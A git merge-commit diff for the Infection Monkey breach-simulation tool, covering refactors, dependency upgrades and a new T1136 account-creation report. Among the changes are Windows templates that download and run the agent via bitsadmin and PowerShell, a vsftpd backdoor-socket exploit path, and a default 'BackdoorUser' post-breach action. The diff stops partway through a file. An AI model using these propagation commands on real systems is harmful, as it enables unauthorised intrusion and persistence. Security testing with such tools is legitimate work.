Merge remote-tracking branch 'upstream/develop' into monkey_telemetry_fabrication

# Conflicts:
#	envs/monkey_zoo/blackbox/island_client/monkey_island_client.py
#	envs/monkey_zoo/blackbox/test_blackbox.py

.gitmodules

@@ -1,3 +1,4 @@
+
 [submodule "monkey/monkey_island/cc/services/attack/attack_data"]
 	path = monkey/monkey_island/cc/services/attack/attack_data
-	url = https://github.com/mitre/cti
+	url = https://github.com/guardicore/cti

.travis.yml

@@ -36,7 +36,7 @@ script:
 ## Display the linter issues
 - cat flake8_warnings.txt
 ## Make sure that we haven't increased the amount of warnings.
-- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=190
+- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=120
 - if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
 
 ## Run unit tests
@@ -53,7 +53,7 @@ script:
 - cd -
 - cd monkey_island/cc/ui
 - eslint ./src --quiet
-- JS_WARNINGS_AMOUNT_UPPER_LIMIT=37
+- JS_WARNINGS_AMOUNT_UPPER_LIMIT=490
 - eslint ./src --max-warnings $JS_WARNINGS_AMOUNT_UPPER_LIMIT
 
 after_success:

README.md

@@ -13,10 +13,6 @@ Welcome to the Infection Monkey!
 
 The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server.
 
-<img src=".github/map-full.png" >
-
-<img src=".github/Security-overview.png" width="800" height="500">
-
 The Infection Monkey is comprised of two parts:
 
 * **Monkey** - A tool which infects other machines and propagates to them.
@@ -24,6 +20,20 @@ The Infection Monkey is comprised of two parts:
 
 To read more about the Monkey, visit [infectionmonkey.com](https://infectionmonkey.com). 
 
+## Screenshots
+
+### Map
+<img src=".github/map-full.png"  width="800" height="600">
+
+### Security report
+<img src=".github/security-report.png"  width="800" height="500">
+
+### Zero trust report
+<img src=".github/zero-trust-report.png"  width="800" height="500">
+
+### ATT&CK report
+<img src=".github/attack-report.png"  width="900" height="500">
+
 ## Main Features
 
 The Infection Monkey uses the following techniques and exploits to propagate to other machines.
@@ -40,6 +50,8 @@ The Infection Monkey uses the following techniques and exploits to propagate to
   * Conficker
   * SambaCry
   * Elastic Search (CVE-2015-1427)
+  * Weblogic server
+  * and more
 
 ## Setup
 Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).

docker/Dockerfile

@@ -2,7 +2,7 @@ FROM debian:stretch-slim
 
 LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>"
 
-ARG RELEASE=1.6
+ARG RELEASE=1.8.0
 ARG DEBIAN_FRONTEND=noninteractive
 
 EXPOSE 5000

envs/monkey_zoo/blackbox/island_client/monkey_island_client.py

@@ -1,4 +1,5 @@
 import json
+
 import logging
 from time import sleep
 

envs/monkey_zoo/blackbox/test_blackbox.py

@@ -1,8 +1,8 @@
-import logging
 import os
-from time import sleep
+import logging
 
 import pytest
+from time import sleep
 
 from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
 from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
@@ -31,7 +31,6 @@ def GCPHandler(request):
 
     def fin():
         GCPHandler.stop_machines(" ".join(GCP_TEST_MACHINE_LIST))
-        pass
 
     request.addfinalizer(fin)
 

envs/os_compatibility/test_compatibility.py

@@ -57,6 +57,3 @@ class TestOSCompatibility(object):
 
         if len(ips_that_communicated) < len(machine_list):
             assert False
-
-
-

monkey/common/version.py

@@ -4,7 +4,7 @@ from pathlib import Path
 
 MAJOR = "1"
 MINOR = "8"
-PATCH = "0"
+PATCH = "1"
 build_file_path = Path(__file__).parent.joinpath("BUILD")
 with open(build_file_path, "r") as build_file:
     BUILD = build_file.read()

monkey/infection_monkey/exploit/vsftpd.py

@@ -129,7 +129,7 @@ class VSFTPDExploiter(HostExploiter):
         change_permission = str.encode(str(change_permission) + '\n')
         LOG.info("change_permission command is %s", change_permission)
         backdoor_socket.send(change_permission)
-        T1222Telem(ScanStatus.USED, change_permission, self.host).send()
+        T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send()
 
         # Run monkey on the machine
         parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
@@ -143,7 +143,7 @@ class VSFTPDExploiter(HostExploiter):
         if backdoor_socket.send(run_monkey):
             LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux,
                      self.host, run_monkey)
-            self.add_executed_cmd(run_monkey)
+            self.add_executed_cmd(run_monkey.decode())
             return True
         else:
             return False

monkey/infection_monkey/exploit/weblogic.py

@@ -4,7 +4,6 @@ import time
 import copy
 
 from requests import post, exceptions
-from http.server import BaseHTTPRequestHandler, HTTPServer
 
 from infection_monkey.exploit.web_rce import WebRCE
 from infection_monkey.exploit.HostExploiter import HostExploiter

monkey/infection_monkey/model/__init__.py

@@ -14,10 +14,10 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,)
 GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
 DROPPER_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,)
 MONKEY_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,)
-MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \
+MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' \
-                      '/c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
+                      '&cmd /c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
-DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \
+DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & ' \
-                   'file_path)s exit)) > NUL 2>&1 '
+                        'if not exist %(file_path)s exit)) > NUL 2>&1 '
 
 # Commands used for downloading monkeys
 POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \

monkey/infection_monkey/network/info.py

@@ -51,18 +51,15 @@ if is_windows_os():
         local_hostname = socket.gethostname()
         return socket.gethostbyname_ex(local_hostname)[2]
 
-
     def get_routes():
         raise NotImplementedError()
 else:
     from fcntl import ioctl
 
-
     def local_ips():
         valid_ips = [network['addr'] for network in get_host_subnets()]
         return valid_ips
 
-
     def get_routes():  # based on scapy implementation for route parsing
         try:
             f = open("/proc/net/route", "r")

monkey/infection_monkey/network/ping_scanner.py

@@ -7,7 +7,6 @@ import sys
 import infection_monkey.config
 from infection_monkey.network.HostFinger import HostFinger
 from infection_monkey.network.HostScanner import HostScanner
-from infection_monkey.model.host import VictimHost
 
 __author__ = 'itamar'
 

monkey/infection_monkey/requirements.txt

@@ -9,7 +9,11 @@ git+https://github.com/guardicore/pyinstaller
 ecdsa
 netifaces
 ipaddress
-wmi
+# Locking WMI since version 1.5 introduced breaking change on Linux agent compilation.
+# See breaking change here: https://github.com/tjguk/wmi/commit/dcf8e3eca79bb8c0101ffb83e25c066b0ba9e16d
+# Causes pip to error with:
+# Could not find a version that satisfies the requirement pywin32 (from wmi->-r /src/infection_monkey/requirements.txt (line 12)) (from versions: none)
+wmi==1.4.9
 pywin32 ; sys_platform == 'win32'
 pymssql<3.0
 pyftpdlib

monkey/infection_monkey/system_info/__init__.py

@@ -1,5 +1,4 @@
 import logging
-import socket
 import sys
 
 import psutil

monkey/infection_monkey/telemetry/base_telem.py

@@ -17,12 +17,16 @@ class BaseTelem(object, metaclass=abc.ABCMeta):
     def __init__(self):
         pass
 
-    def send(self):
+    def send(self, log_data=True):
         """
         Sends telemetry to island
         """
         data = self.get_data()
-        logger.debug("Sending {} telemetry. Data: {}".format(self.telem_category, json.dumps(data)))
+        if log_data:
+            data_to_log = json.dumps(data)
+        else:
+            data_to_log = 'redacted'
+        logger.debug("Sending {} telemetry. Data: {}".format(self.telem_category, data_to_log))
         ControlClient.send_telemetry(self.telem_category, data)
 
     @property

monkey/infection_monkey/telemetry/system_info_telem.py

@@ -17,3 +17,6 @@ class SystemInfoTelem(BaseTelem):
 
     def get_data(self):
         return self.system_info
+
+    def send(self, log_data=False):
+        super(SystemInfoTelem, self).send(log_data)

monkey/infection_monkey/transport/__init__.py

@@ -1,3 +1 @@
 from infection_monkey.transport.http import HTTPServer, LockedHTTPServer
-
-__author__ = 'hoffer'

monkey/infection_monkey/utils/windows/users.py

@@ -73,7 +73,6 @@ class AutoNewWindowsUser(AutoNewUser):
 
     def run_as(self, command):
         # Importing these only on windows, as they won't exist on linux.
-        import win32con
         import win32process
         import win32api
         import win32event

monkey/monkey_island/cc/bootloader_server.py

@@ -46,4 +46,3 @@ class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler):
     @staticmethod
     def get_bootloader_resource_url(server_ip):
         return "https://" + server_ip + ":" + str(Environment._ISLAND_PORT) + "/api/bootloader/"
-

monkey/monkey_island/cc/environment/__init__.py

@@ -1,7 +1,7 @@
 from abc import ABCMeta, abstractmethod
 from datetime import timedelta
 import os
-from Crypto.Hash import SHA3_512
+import hashlib
 
 __author__ = 'itay.mizeretz'
 
@@ -45,10 +45,11 @@ class Environment(object, metaclass=ABCMeta):
     def get_auth_expiration_time(self):
         return self._AUTH_EXPIRATION_TIME
 
-    def hash_secret(self, secret):
+    @staticmethod
-        h = SHA3_512.new()
+    def hash_secret(secret):
-        h.update(secret)
+        hash_obj = hashlib.sha3_512()
-        return h.hexdigest()
+        hash_obj.update(secret.encode('utf-8'))
+        return hash_obj.hexdigest()
 
     def get_deployment(self):
         return self._get_from_config('deployment', 'unknown')

monkey/monkey_island/cc/environment/test_aws.py

@@ -0,0 +1,25 @@
+from monkey_island.cc.auth import User
+from monkey_island.cc.testing.IslandTestCase import IslandTestCase
+from monkey_island.cc.environment.aws import AwsEnvironment
+
+import hashlib
+
+
+class TestAwsEnvironment(IslandTestCase):
+    def test_get_auth_users(self):
+        env = AwsEnvironment()
+        # This is "injecting" the instance id to the env. This is the UTs aren't always executed on the same AWS machine
+        # (might not be an AWS machine at all).
+        # Perhaps it would have been more elegant to create a Mock, but not worth it for
+        # this small test.
+        env._instance_id = "i-666"
+        hash_obj = hashlib.sha3_512()
+        hash_obj.update(b"i-666")
+        auth_users = env.get_auth_users()
+        assert isinstance(auth_users, list)
+        assert len(auth_users) == 1
+        auth_user = auth_users[0]
+        assert isinstance(auth_user, User)
+        assert auth_user.id == 1
+        assert auth_user.username == "monkey"
+        assert auth_user.secret == hash_obj.hexdigest()

monkey/monkey_island/cc/main.py

@@ -31,7 +31,7 @@ from monkey_island.cc.bootloader_server import BootloaderHttpServer
 from monkey_island.cc.setup import setup
 
 
-def main(should_setup_only):
+def main(should_setup_only=False):
     logger.info("Starting bootloader server")
     mongo_url = os.environ.get('MONGO_URL', env.get_mongo_url())
     bootloader_server_thread = Thread(target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True)

monkey/monkey_island/cc/models/__init__.py

@@ -12,9 +12,9 @@ else:
     connect(db=env.mongo_db_name, host=env.mongo_db_host, port=env.mongo_db_port)
 
 # Order of importing matters here, for registering the embedded and referenced documents before using them.
-from .config import Config
+from .config import Config  # noqa: F401
-from .creds import Creds
+from .creds import Creds  # noqa: F401
-from .monkey_ttl import MonkeyTtl
+from .monkey_ttl import MonkeyTtl  # noqa: F401
-from .pba_results import PbaResults
+from .pba_results import PbaResults  # noqa: F401
-from .command_control_channel import CommandControlChannel
+from .command_control_channel import CommandControlChannel  # noqa: F401
-from .monkey import Monkey
+from .monkey import Monkey  # noqa: F401

monkey/monkey_island/cc/models/attack/mitigation.py

@@ -16,4 +16,3 @@ class Mitigation(EmbeddedDocument):
         description = mitigation['description']
         url = MitreApiInterface.get_stix2_external_reference_url(mitigation)
         return Mitigation(name=name, description=description, url=url)
-

monkey/monkey_island/cc/models/test_monkey.py

@@ -13,8 +13,8 @@ logger = logging.getLogger(__name__)
 
 class TestMonkey(IslandTestCase):
     """
-    Make sure to set server environment to `testing` in server_config.json! Otherwise this will mess up your mongo instance and
+    Make sure to set server environment to `testing` in server_config.json!
-    won't work.
+    Otherwise this will mess up your mongo instance and won't work.
 
     Also, the working directory needs to be the working directory from which you usually run the island so the
     server_config.json file is found and loaded.

monkey/monkey_island/cc/models/zero_trust/test_finding.py

@@ -33,7 +33,8 @@ class TestFinding(IslandTestCase):
 
         event_example = Event.create_event(
             title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)
-        Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example])
+        Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION,
+                             status=zero_trust_consts.STATUS_FAILED, events=[event_example])
 
         self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1)
         self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1)

monkey/monkey_island/cc/resources/bootloader_test.py

@@ -1,7 +1,6 @@
 from unittest import TestCase
 
 from monkey_island.cc.resources.bootloader import Bootloader
-from monkey_island.cc.services.utils.bootloader_config import SUPPORTED_WINDOWS_VERSIONS
 
 
 class TestBootloader(TestCase):

monkey/monkey_island/cc/resources/node_states.py

@@ -1,4 +1,3 @@
-from flask import request
 import flask_restful
 
 from monkey_island.cc.auth import jwt_required

monkey/monkey_island/cc/services/attack/attack_config.py

@@ -120,7 +120,7 @@ class AttackConfig(object):
     def set_bool_conf_val(path, val, monkey_config):
         """
         Changes monkey's configuration by setting one of its boolean fields value
-        :param path: Path to boolean value in monkey's configuration. E.g. ['monkey', 'system_info', 'should_use_mimikatz']
+        :param path: Path to boolean value in monkey's configuration. ['monkey', 'system_info', 'should_use_mimikatz']
         :param val: Boolean
         :param monkey_config: Monkey's configuration
         """

monkey/monkey_island/cc/services/attack/attack_data

@@ -1 +1 @@
-Subproject commit c139e37bdc51acbc7d0488a5be48553caffdbbd7
+Subproject commit fb8942b1a10f4e734ed75542f2ccae7cbd72c46d

monkey/monkey_island/cc/services/attack/attack_report.py

@@ -4,6 +4,7 @@ from monkey_island.cc.models import Monkey
 from monkey_island.cc.services.attack.technique_reports import T1210, T1197, T1110, T1075, T1003, T1059, T1086, T1082
 from monkey_island.cc.services.attack.technique_reports import T1145, T1105, T1065, T1035, T1129, T1106, T1107, T1188
 from monkey_island.cc.services.attack.technique_reports import T1090, T1041, T1222, T1005, T1018, T1016, T1021, T1064
+from monkey_island.cc.services.attack.technique_reports import T1136
 from monkey_island.cc.services.attack.attack_config import AttackConfig
 from monkey_island.cc.database import mongo
 from monkey_island.cc.services.reporting.report_generation_synchronisation import safe_generate_attack_report
@@ -35,7 +36,8 @@ TECHNIQUES = {'T1210': T1210.T1210,
               'T1018': T1018.T1018,
               'T1016': T1016.T1016,
               'T1021': T1021.T1021,
-              'T1064': T1064.T1064
+              'T1064': T1064.T1064,
+              'T1136': T1136.T1136
               }
 
 REPORT_NAME = 'new_report'

monkey/monkey_island/cc/services/attack/attack_schema.py

@@ -289,6 +289,22 @@ SCHEMA = {
                     "description": "Data exfiltration is performed over the Command and Control channel."
                 }
             }
+        },
+        "persistence": {
+            "title": "Persistence",
+            "type": "object",
+            "link": "https://attack.mitre.org/tactics/TA0003/",
+            "properties": {
+                "T1136": {
+                    "title": "Create account",
+                    "type": "bool",
+                    "value": True,
+                    "necessary": False,
+                    "link": "https://attack.mitre.org/techniques/T1136",
+                    "description": "Adversaries with a sufficient level of access "
+                                    "may create a local system, domain, or cloud tenant account."
+                }
+            }
         }
     }
 }

monkey/monkey_island/cc/services/attack/mitre_api_interface.py

@@ -1,6 +1,6 @@
 from typing import List, Dict
 
-from stix2 import FileSystemSource, Filter, CourseOfAction, AttackPattern, v20
+from stix2 import FileSystemSource, Filter, CourseOfAction, AttackPattern
 
 
 class MitreApiInterface:
@@ -32,14 +32,14 @@ class MitreApiInterface:
         return all_techniques
 
     @staticmethod
-    def get_stix2_external_reference_id(stix2_data: v20._DomainObject) -> str:
+    def get_stix2_external_reference_id(stix2_data) -> str:
         for reference in stix2_data['external_references']:
             if reference['source_name'] == "mitre-attack" and 'external_id' in reference:
                 return reference['external_id']
         return ''
 
     @staticmethod
-    def get_stix2_external_reference_url(stix2_data: v20._DomainObject) -> str:
+    def get_stix2_external_reference_url(stix2_data) -> str:
         for reference in stix2_data['external_references']:
             if 'url' in reference:
                 return reference['url']

monkey/monkey_island/cc/services/attack/technique_reports/T1136.py

@@ -0,0 +1,38 @@
+from monkey_island.cc.services.attack.technique_reports import AttackTechnique
+from monkey_island.cc.services.reporting.report import ReportService
+from common.utils.attack_utils import ScanStatus
+from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER, POST_BREACH_COMMUNICATE_AS_NEW_USER
+
+__author__ = "shreyamalviya"
+
+
+class T1136(AttackTechnique):
+    tech_id = "T1136"
+    unscanned_msg = "Monkey didn't try creating a new user on the network's systems."
+    scanned_msg = "Monkey tried creating a new user on the network's systems, but failed."
+    used_msg = "Monkey created a new user on the network's systems."
+
+    @staticmethod
+    def get_report_data():
+        data = {'title': T1136.technique_title()}
+
+        scanned_nodes = ReportService.get_scanned()
+        status = ScanStatus.UNSCANNED.value
+        for node in scanned_nodes:
+            if node['pba_results'] != 'None':
+                for pba in node['pba_results']:
+                    if pba['name'] in [POST_BREACH_BACKDOOR_USER,
+                                       POST_BREACH_COMMUNICATE_AS_NEW_USER]:
+                        status = ScanStatus.USED.value if pba['result'][1]\
+                                                       else ScanStatus.SCANNED.value
+                        data.update({
+                            'info': [{
+                                'machine': {
+                                    'hostname': pba['hostname'],
+                                    'ips': node['ip_addresses'],
+                                },
+                                'result': ': '.join([pba['name'], pba['result'][0]])
+                            }]
+                        })
+            data.update(T1136.get_message_and_status(status))
+        return data

monkey/monkey_island/cc/services/attack/technique_reports/__init__.py

@@ -5,7 +5,7 @@ from monkey_island.cc.database import mongo
 from common.utils.attack_utils import ScanStatus
 from monkey_island.cc.services.attack.attack_config import AttackConfig
 from common.utils.code_utils import abstractstatic
-from cc.models.attack.attack_mitigations import AttackMitigations
+from monkey_island.cc.models.attack.attack_mitigations import AttackMitigations
 
 logger = logging.getLogger(__name__)
 
@@ -129,4 +129,3 @@ class AttackTechnique(object, metaclass=abc.ABCMeta):
             return {'mitigations': mitigation_document.to_mongo().to_dict()['mitigations']}
         else:
             return {}
-

monkey/monkey_island/cc/services/bootloader_test.py

@@ -32,4 +32,3 @@ class TestBootloaderService(TestCase):
         ips = ["127.1.1.1", "127.0.0.1", "192.168.56.1"]
         ips = BootloaderService.remove_local_ips(ips)
         self.assertEqual(["192.168.56.1"], ips)
-

monkey/monkey_island/cc/services/config_schema.py

@@ -130,7 +130,7 @@ SCHEMA = {
                     "title": "Collect the machine's hostname",
                     "attack_techniques": []
                 },
-{
+                {
                     "type": "string",
                     "enum": [
                         PROCESS_LIST_COLLECTOR
@@ -140,7 +140,7 @@ SCHEMA = {
                 },
             ],
         },
-        "post_breach_acts": {
+        "post_breach_actions": {
             "title": "Post breach actions",
             "type": "string",
             "anyOf": [
@@ -150,7 +150,7 @@ SCHEMA = {
                         "BackdoorUser"
                     ],
                     "title": "Back door user",
-                    "attack_techniques": []
+                    "attack_techniques": ["T1136"]
                 },
                 {
                     "type": "string",
@@ -158,7 +158,7 @@ SCHEMA = {
                         "CommunicateAsNewUser"
                     ],
                     "title": "Communicate as new user",
-                    "attack_techniques": []
+                    "attack_techniques": ["T1136"]
                 },
             ],
         },
@@ -375,9 +375,10 @@ SCHEMA = {
                             "type": "array",
                             "uniqueItems": True,
                             "items": {
-                                "$ref": "#/definitions/post_breach_acts"
+                                "$ref": "#/definitions/post_breach_actions"
                             },
                             "default": [
+                                "BackdoorUser",
                                 "CommunicateAsNewUser"
                             ],
                             "description": "List of actions the Monkey will run post breach"

monkey/monkey_island/cc/services/node.py

@@ -411,5 +411,6 @@ class NodeService:
     def get_hostname_by_id(node_id):
         return NodeService.get_node_hostname(mongo.db.monkey.find_one({'_id': node_id}, {'hostname': 1}))
 
+
 class NodeCreationException(Exception):
     pass

monkey/monkey_island/cc/services/telemetry/processing/system_info.py

@@ -101,4 +101,3 @@ def process_mimikatz_and_wmi_info(telemetry_json):
         monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
         wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
         wmi_handler.process_and_handle_wmi_info()
-

monkey/monkey_island/cc/services/utils/bootloader_config.py

@@ -9,4 +9,3 @@ SUPPORTED_WINDOWS_VERSIONS = {
     "windows7_sp1": True,
     "windows8_or_greater": True,
 }
-

monkey/monkey_island/cc/services/utils/node_states_test.py

@@ -11,5 +11,3 @@ class TestNodeGroups(TestCase):
         self.assertEqual(NodeStates.get_by_keywords(['monkey', 'linux', 'running']), NodeStates.MONKEY_LINUX_RUNNING)
         with self.assertRaises(NoGroupsFoundException):
             NodeStates.get_by_keywords(['bogus', 'values', 'from', 'long', 'list', 'should', 'fail'])
-
-

monkey/monkey_island/cc/ui/.babelrc

@@ -1,10 +1,15 @@
 {
   "presets": [
-    "es2015",
+    [
-    "stage-0",
+      "@babel/preset-env",
-    "react"
+      {
+        "useBuiltIns": "entry"
+      }
+    ],
+    "@babel/preset-react"
   ],
   "plugins": [
-    "emotion"
+    "emotion",
+    "@babel/plugin-proposal-class-properties"
   ]
 }

monkey/monkey_island/cc/ui/.eslintrc

@@ -3,11 +3,25 @@
   "plugins": [
     "react"
   ],
+  "extends": [
+    "eslint:recommended",
+    "plugin:react/recommended"
+  ],
   "parserOptions": {
     "ecmaVersion": 6,
     "sourceType": "module",
+    "allowImportExportEverywhere": false,
     "ecmaFeatures": {
-      "jsx": true
+      "jsx": true,
+      "globalReturn": false
+    },
+    "babelOptions": {
+      "configFile": ".babelrc"
+    }
+  },
+  "settings": {
+    "react": {
+      "version": "detect"
     }
   },
   "env": {
@@ -25,9 +39,8 @@
     ],
     "no-undef": 1,
     "global-strict": 0,
-    "no-extra-semi": 1,
     "no-underscore-dangle": 0,
-    "no-console": 1,
+    "no-console": 0,
     "no-unused-vars": 1,
     "no-trailing-spaces": [
       1,
@@ -38,6 +51,14 @@
     "no-unreachable": 1,
     "no-alert": 0,
     "react/jsx-uses-react": 1,
-    "react/jsx-uses-vars": 1
+    "react/jsx-uses-vars": 1,
+    "react/jsx-key": 1,
+    "react/prop-types": 1,
+    "react/no-unescaped-entities": 1,
+    "react/no-unknown-property": [1, { "ignore": ["class"] }],
+    "react/no-string-refs": 1,
+    "react/display-name": 1,
+    "no-useless-escape": 1,
+    "no-prototype-builtins": 1
   }
 }

monkey/monkey_island/cc/ui/package.json

@@ -21,23 +21,23 @@
   "repository": "",
   "keywords": [],
   "author": "Guardicore",
+  "browserslist": "> 0.25%, not dead",
   "devDependencies": {
-    "babel-cli": "^6.26.0",
+    "@babel/cli": "^7.8.4",
-    "babel-core": "^6.26.3",
+    "@babel/core": "^7.9.6",
-    "babel-eslint": "^8.2.6",
+    "@babel/plugin-proposal-class-properties": "^7.8.3",
-    "babel-loader": "^7.1.5",
+    "@babel/plugin-transform-runtime": "^7.9.6",
-    "babel-polyfill": "^6.26.0",
+    "@babel/preset-env": "^7.9.6",
-    "babel-preset-env": "^1.7.0",
+    "@babel/preset-react": "^7.9.0",
-    "babel-preset-es2015": "^6.24.1",
+    "@babel/runtime": "^7.9.6",
-    "babel-preset-react": "^6.24.1",
+    "babel-eslint": "^10.1.0",
-    "babel-preset-stage-0": "^6.5.0",
+    "babel-loader": "^8.0.0",
-    "bower-webpack-plugin": "^0.1.9",
     "chai": "^4.2.0",
-    "copyfiles": "^2.1.1",
+    "copyfiles": "^2.2.0",
-    "css-loader": "^1.0.1",
+    "css-loader": "^3.5.0",
-    "eslint": "^5.16.0",
+    "eslint": "^6.8.0",
-    "eslint-loader": "^2.2.1",
+    "eslint-loader": "^4.0.1",
-    "eslint-plugin-react": "^7.16.0",
+    "eslint-plugin-react": "^7.19.0",
     "file-loader": "^1.1.11",
     "glob": "^7.1.6",
     "html-loader": "^0.5.5",
@@ -50,21 +50,22 @@
     "karma-phantomjs-launcher": "^1.0.0",
     "karma-sourcemap-loader": "^0.3.5",
     "karma-webpack": "^3.0.5",
-    "minimist": "^1.2.0",
+    "minimist": "^1.2.5",
     "mocha": "^5.2.0",
     "null-loader": "^0.1.1",
     "phantomjs-prebuilt": "^2.1.16",
     "react-addons-test-utils": "^15.6.2",
     "react-event-timeline": "^1.6.3",
-    "react-hot-loader": "^4.12.18",
+    "react-hot-loader": "^4.12.20",
     "rimraf": "^2.7.1",
     "style-loader": "^0.22.1",
     "url-loader": "^1.1.2",
-    "webpack": "^4.41.2",
+    "webpack": "^4.43.0",
-    "webpack-cli": "^3.3.10",
+    "webpack-cli": "^3.3.11",
-    "webpack-dev-server": "^3.9.0"
+    "webpack-dev-server": "^3.10.3"
   },
   "dependencies": {
+    "@babel/polyfill": "^7.8.0",
     "@emotion/core": "^10.0.22",
     "@fortawesome/fontawesome-svg-core": "^1.2.25",
     "@fortawesome/free-regular-svg-icons": "^5.11.2",
@@ -110,6 +111,7 @@
     "react-tooltip-lite": "^1.10.0",
     "redux": "^4.0.4",
     "sass-loader": "^7.3.1",
-    "sha3": "^2.0.7"
+    "sha3": "^2.0.7",
+    "stylelint": "^13.3.3"
   }
 }

monkey/monkey_island/cc/ui/server.js

@@ -1,9 +1,9 @@
 /*eslint no-console:0 */
 'use strict';
-require('core-js/fn/object/assign');
+import assign from 'core-js/fn/object'
-const webpack = require('webpack');
+import webpack from 'webpack'
-const WebpackDevServer = require('webpack-dev-server');
+import WebpackDevServer from 'webpack-dev-server'
-const config = require('./webpack.config');
+import config from './webpack.config'
 
 /**
  * Flag indicating whether webpack compiled for the first time.

monkey/monkey_island/cc/ui/src/components/Main.js

@@ -2,7 +2,8 @@ import React from 'react';
 import {BrowserRouter as Router, NavLink, Redirect, Route, Switch} from 'react-router-dom';
 import {Col, Grid, Row} from 'react-bootstrap';
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'
-import { faCheck, faUndo } from '@fortawesome/free-solid-svg-icons'
+import { faCheck } from '@fortawesome/free-solid-svg-icons/faCheck'
+import { faUndo } from '@fortawesome/free-solid-svg-icons/faUndo'
 
 import RunServerPage from 'components/pages/RunServerPage';
 import ConfigurePage from 'components/pages/ConfigurePage';
@@ -25,10 +26,10 @@ import 'react-toggle/style.css';
 import 'react-table/react-table.css';
 import VersionComponent from './side-menu/VersionComponent';
 
-let logoImage = require('../images/monkey-icon.svg');
+import logoImage from '../images/monkey-icon.svg';
-let infectionMonkeyImage = require('../images/infection-monkey.svg');
+import infectionMonkeyImage from '../images/infection-monkey.svg';
-let guardicoreLogoImage = require('../images/guardicore-logo.png');
+import guardicoreLogoImage from '../images/guardicore-logo.png';
-let notificationIcon = require('../images/notification-logo-512x512.png');
+import notificationIcon from '../images/notification-logo-512x512.png';
 
 const reportZeroTrustRoute = '/report/zeroTrust';
 
@@ -125,7 +126,7 @@ class AppComponent extends AuthComponent {
           <Row>
             <Col sm={3} md={2} className='sidebar'>
               <div className='header'>
-                <img src={logoImage} style={{width: '5vw', margin: '15px'}}/>
+                <img alt="logo" src={logoImage} style={{width: '5vw', margin: '15px'}}/>
                 <img src={infectionMonkeyImage} style={{width: '15vw'}} alt='Infection Monkey'/>
               </div>
 
@@ -188,7 +189,7 @@ class AppComponent extends AuthComponent {
               <hr/>
               <div className='guardicore-link text-center' style={{'marginBottom': '0.5em'}}>
                 <span>Powered by</span>
-                <a href='http://www.guardicore.com' target='_blank'>
+                <a href='http://www.guardicore.com' rel="noopener noreferrer" target='_blank'>
                   <img src={guardicoreLogoImage} alt='GuardiCore'/>
                 </a>
               </div>

monkey/monkey_island/cc/ui/src/components/attack/ConfigMatrixComponent.js

@@ -8,8 +8,8 @@ import '../../styles/Tooltip.scss';
 import {Col} from 'react-bootstrap';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faCircle as faCircle } from '@fortawesome/free-solid-svg-icons';
+import { faCircle as faCircle } from '@fortawesome/free-solid-svg-icons/faCircle';
-import { faCircle as faCircleThin } from '@fortawesome/free-regular-svg-icons';
+import { faCircle as faCircleThin } from '@fortawesome/free-regular-svg-icons/faCircle';
 
 class ConfigMatrixComponent extends AuthComponent {
   constructor(props) {

monkey/monkey_island/cc/ui/src/components/attack/techniques/MitigationsComponent.js

@@ -49,7 +49,7 @@ class MitigationsComponent extends React.Component {
 
   static getMitigationName(name, url) {
     if(url){
-      return (<a href={url} target={'_blank'}>{name}</a>)
+      return (<a href={url} rel="noopener noreferrer" target={'_blank'}>{name}</a>)
     } else {
       return (<p>{name}</p>)
     }

monkey/monkey_island/cc/ui/src/components/attack/techniques/T1136.js

@@ -0,0 +1,43 @@
+import React from 'react';
+import ReactTable from 'react-table';
+import {renderMachineFromSystemData, ScanStatus} from './Helpers'
+
+class T1136 extends React.Component {
+
+  constructor(props) {
+    super(props);
+  }
+
+  static getColumns() {
+      return ([{
+        columns: [
+            { Header: 'Machine',
